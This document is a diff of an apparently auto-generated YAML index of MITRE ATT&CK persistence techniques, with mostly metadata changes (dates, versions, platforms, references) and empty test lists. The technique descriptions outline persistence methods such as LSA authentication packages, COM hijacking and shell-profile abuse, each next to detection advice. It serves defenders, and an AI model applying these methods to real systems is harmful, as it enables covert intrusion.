-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33987,12 +34410,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -34070,9 +34491,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -34099,7 +34519,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -34121,41 +34541,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -34164,22 +34553,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -34245,7 +34661,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -34319,11 +34734,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -34340,7 +34754,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -34350,7 +34763,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -34359,19 +34772,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -34419,11 +34830,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -34452,24 +34864,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -34504,9 +34918,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -34566,7 +34977,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -34591,13 +35002,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -34650,8 +35059,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -34699,78 +35108,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34818,6 +35160,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -34828,9 +35174,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -34839,8 +35189,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -34877,7 +35286,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34900,12 +35309,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -34983,41 +35391,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -35026,27 +35404,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -35107,7 +35512,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -35151,7 +35555,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -35173,7 +35577,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -35254,7 +35657,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
